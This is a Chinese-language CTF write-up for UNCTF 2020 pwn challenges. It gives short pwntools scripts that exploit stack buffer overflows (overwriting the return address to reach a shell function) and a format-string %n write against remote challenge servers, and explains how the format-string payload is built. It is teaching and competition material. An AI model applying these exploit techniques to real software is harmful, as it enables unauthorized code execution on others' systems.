[UNCTF 2020] PWN方向
YLBNB
直接在linux使用指令nc 45.158.33.12 8000
from pwn import *
io = remote('45.158.33.12',8000)
payload = 'chcp 65001'
io.sendline(payload)
print(io.recv())
运行脚本得到flag
fan
明显的栈溢出
binsh+system地址
#coding=utf-8
#!/usr/bin/env python
from pwn import *
io = remote('node2.hackingfor.fun',49408)
binsh = 0x400739
payload = 'A' * (0x30 + 8) + p64(binsh)
print(payload)
io.sendline(payload)
io.interactive()
do_you_like_me?
同上题,明显的栈溢出
binsh+system地址
#coding=utf-8
#!/usr/bin/env python
from pwn import *
io = remote('node2.hackingfor.fun',41043)
binsh = 0x4006D1
payload = 'A' * (0x10 + 8) + p64(binsh)
print(payload)
io.sendline(payload)
io.interactive()
你真的会pwn嘛?(*格式化字符串漏洞)
0x00 逆向分析
只要dword_60107c不为0即可得到shell
运用格式化字符串漏洞%n即可修改dword_60107c
0x01 获取偏移量
可以看到输入的8个A在第十个变量,所以偏移量为10。
0x02 脚本
#coding=utf-8
#!/usr/bin/env python
from pwn import *
from LibcSearcher import *
io = remote('node2.hackingfor.fun',46560)
elf = ELF('./pwn22')
dword_60107C = 0x60107C
payload = '...%11$n' + p64(dword_60107C)
print(payload)
io.sendline(payload)
#偏移量10
io.interactive()
这个payload有三个注意点:
1.printf有\x00截断,即碰到\x00就会停止读入,所以如果把dword的地址放在%11$n
之前,由于地址中存在\x00字符,所以会导致读取时碰到\x00而读不到%11$n就结束了。因此要把%11$n
放在前面
2. %11$n
只会把它之前输出的字符数量写到指定地址里,之后的不行。payload中的...%11$n
改为%11$n...
则写进去的是0,因为在它之前没有输出字符。上图中虽然输出了...|\x10
但是真正写进去的只有...
,也就是3。
3. 为了让printf认为dword的地址是要写进去的地址,一定要让它的地址刚好占一个机器字长。所以在这之前的 %11$n
一定要用...
补齐8个字符(当然不用.
用别的字符也是可以的)